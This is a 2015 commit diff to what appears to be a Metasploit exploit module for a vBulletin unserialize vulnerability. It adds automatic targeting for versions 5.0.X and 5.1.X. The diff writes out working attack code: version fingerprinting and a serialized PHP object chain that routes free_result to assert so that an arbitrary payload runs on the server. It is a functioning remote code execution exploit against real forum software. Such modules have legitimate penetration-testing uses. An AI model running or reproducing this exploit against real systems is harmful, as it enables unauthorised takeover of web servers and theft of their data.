The modules now works on 5.1.X and 5.0.X

jvoisin · jvoisin · commit e2678af0fe28 · 2015-11-07T14:28:25.000+01:00
- Added automatic targeting
- Added support for 5.0.X
diff --git a/modules/exploits/unix/webapp/vbulletin_unserialize.rb b/modules/exploits/unix/webapp/vbulletin_unserialize.rb
@@ -35,7 +35,11 @@ def initialize(info = {})
           ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
         ],
       'Arch'           => ARCH_PHP,
-      'Targets'        => [['vBulletin 5.1.2', {}]],
+      'Targets'        => [
+          [ 'Automatic Targeting', { 'auto' => true }  ],
+          ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],
+          ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],
+      ],
       'DisclosureDate' => 'Nov 4 2015',
       'DefaultTarget'  => 0))
 
@@ -46,18 +50,45 @@ def initialize(info = {})
   end
 
   def check
-    res = send_request_cgi({ 'uri' => target_uri.path })
-    if (res && res.body.include?("Version 5.1.") && res.body.include?('Copyright &copy; 2015 vBulletin Solutions, Inc.'))
-      return Exploit::CheckCode::Appears
-    else
-      return Exploit::CheckCode::Unknown
-    end
-    Exploit::CheckCode::Safe
+      begin
+          res = send_request_cgi({ 'uri' => target_uri.path })
+          if (res && res.body.include?('vBulletin Solutions, Inc.'))
+              if res.body.include?("Version 5.0")
+                  @my_target = targets[1] if target['auto']
+                  return Exploit::CheckCode::Appears
+              elsif res.body.include?("Version 5.1")
+                  @my_target = targets[2] if target['auto']
+                  return Exploit::CheckCode::Appears
+              else
+                  return Exploit::CheckCode::Detected
+              end
+          end
+      rescue ::Rex::ConnectionError
+          return Exploit::CheckCode::Safe
+      end
   end
 
   def exploit
+    print_status("#{peer} - Trying to inferprint the instance...")
+
+    @my_target = target
+    check_code = check
+
+    unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
+      fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable instance")
+    end
+
+    if @my_target.nil? || @my_target['auto']
+      fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
+    end
+
+    print_status("#{peer} - Exploiting #{@my_target.name}...")
 
-    chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:18:"vB_Database_MySQLi":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:'
+    chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:'
+    chain << @my_target["chain"].length.to_s
+    chain << ':"'
+    chain << @my_target["chain"]
+    chain << '":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:'
     chain << "#{payload.encoded.length}:\"#{payload.encoded}\";}"
 
     chain = Rex::Text.uri_encode(chain)
